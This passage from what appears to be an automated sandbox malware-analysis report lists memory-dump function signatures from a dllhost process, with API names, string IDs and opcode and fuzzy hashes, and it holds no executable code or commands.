        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: b85a46891ca13ff65f0f0a1d06c19057bac811176374cb755800127e546ad10b
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: 68519E362082809BEF74AF22D984B9877B0F354B84F14619AEB9D47BD5CB38D4E0C791
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: U$\t9"1
        • API String ID: 442123175-2242669097
        • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction ID: 24e0c1333eac9105370902af0790174915e0fe580699feb53542fbe6b2e97b36
        • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction Fuzzy Hash: 1941D632619A8086EB21EF26E8847E9B7B4F348784F504129FF4D87758EB38C4C1C7A0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
        • String ID: pid_
        • API String ID: 517849248-4147670505
        • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction ID: 633b9dff9f89125f02c5721d020b4e0745a32e2679ecbf81f0621d2fd7834ca3
        • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
        • Instruction Fuzzy Hash: 30118E31318B8192EF21BB25E8813DA63B4F788780F804569BF5D83794EF68C9C5C7A0
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Heap$Process$Free
        • String ID:
        • API String ID: 3168794593-0
        • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction ID: 64ad43b1cb82423bf97892969d378a2e5332aa3f4b855cc6ab43c2a680ef8b91
        • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
        • Instruction Fuzzy Hash: 77015732614A80DAEB15EF66A8841A977B0F788F81B494029EB4E43728DE34D0D1C790
        APIs
        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000017C6DD828DF), ref: 0000017C6DD82A12
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: ConsoleMode
        • String ID:
        • API String ID: 4145635619-0
        • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction ID: d347dcc0b6ad053042282627af52433ce3f4fd8773b1876fd7a0050ae48a238b
        • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
        • Instruction Fuzzy Hash: 9891AC3261865199FF72AF6698903ED2BB0B754B8CF44410EEF4E67B89DA34D4C5C3A0
        APIs
          • Part of subcall function 0000017C6DD7E22C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,0000017C6DD7E578), ref: 0000017C6DD7E256
        • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,0000017C6DD7E6A9), ref: 0000017C6DD7E95B
        • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,0000017C6DD7E6A9), ref: 0000017C6DD7E99F
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: CodeInfoPageValid
        • String ID: \t9"1
        • API String ID: 546120528-2818780629
        • Opcode ID: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
        • Instruction ID: e68a0cc44ed8a1cca31643dc150206dd023388c431b8c014acf1302371d8972b
        • Opcode Fuzzy Hash: 368bb57caff044830bbb836d0107136edbd08920f66937ca735bdc2bbc321278
        • Instruction Fuzzy Hash: 7D81A1B260C69186EF75AF25D0803E9BBB1F344740F58415AE78E87791DA39D5C183E0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction ID: 0bd27f7ca993c2d97871c642f52d2c7e33db8b0024e62d645df2e8f73469d51a
        • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction Fuzzy Hash: 7C71933660878251EF75AE26D8D43EA6BB4F385788F44005AEF4D43B89DA35C6C08790
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction ID: c3a42eb6e6f2226626f79d63cc2281fca2daeb1e8978fa476f02fadc0431ca94
        • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction Fuzzy Hash: C151C13620C7C192EE34AE29A5D43EA6A75F384794F54006EEF5D43B89DA39C4C487A0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Info
        • String ID: $\t9"1
        • API String ID: 1807457897-3203091125
        • Opcode ID: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
        • Instruction ID: 65fba2b4e78c4edcf428cbdf4f4273049e68285e2276b90eda211b14bb98fcee
        • Opcode Fuzzy Hash: f3a1ccdfc844010f6d6384e8b727e223aafffbf012ce67cb554655a4b1010233
        • Instruction Fuzzy Hash: ED518D7261C6C08AEB219F25E0843DE7BB4F348748F54426AE78D87B85DB78C1D5CBA0
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: \t9"1
        • API String ID: 442123175-2818780629
        • Opcode ID: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
        • Instruction ID: 99c91ba815dd917f0fc854d9257a00be9796f7eddb93241e14ed99217845ba83
        • Opcode Fuzzy Hash: 9aaf26f040ad1ec26527c6482f0f95a02a03d15fd00723e3f37292bb076685c6
        • Instruction Fuzzy Hash: F831BF72719A8086DF61AF15E8843D9B7B0F758788F844029FB4E87754EB38C5D1CB50
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: ErrorFileLastModuleName
        • String ID: \t9"1
        • API String ID: 2776309574-2818780629
        • Opcode ID: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
        • Instruction ID: 6408e4ca5f4df4ea061ca43f760253d53d68b43277376e155def3152b5fb2846
        • Opcode Fuzzy Hash: afd8fe68969716b5af19fc5389df831274dd0723d0692592c9853f2af0341627
        • Instruction Fuzzy Hash: 23318232218B818AEB70AB25E4843DE77B4F385794F540159EBCC87B98DB38C5C1CB91
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: ExceptionFileHeaderRaise
        • String ID: csm
        • API String ID: 2573137834-1018135373
        • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction ID: a50866fabe839986006eb03e309947d3da57004b0bcf7698e8dfbb17f2668ce8
        • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction Fuzzy Hash: 4611FB32618B8082EB619B15F484299B7F5F788B94F584669EF8D07B64DF3CC5E1CB40
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID:
        • API String ID: 756756679-0
        • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction ID: d469282c332aae85d1324053fa1d6e591f176e669ca5b9e5e49084d4674388d9
        • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction Fuzzy Hash: 3B116D31A15B8085EE15EB67A8482A977B0F788FD1F585168EF4E53765EF38D4C28380
        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.3010696406.0000017C6DD71000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017C6DD70000, based on PE: true
        • Associated: 00000025.00000002.3009440685.0000017C6DD70000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3012114893.0000017C6DD85000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3013332037.0000017C6DD90000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3014637738.0000017C6DD92000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.3015836632.0000017C6DD99000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_17c6dd70000_dllhost.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction ID: fd03b2d5571894d0994852eeb2c30556405b58196b7d8eb11949d64c9d6e7055
        • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction Fuzzy Hash: E3E092316016049AEB15AF63D8483A936F1FB8CF06F44C028CA0E07350EF7D84D9C7A0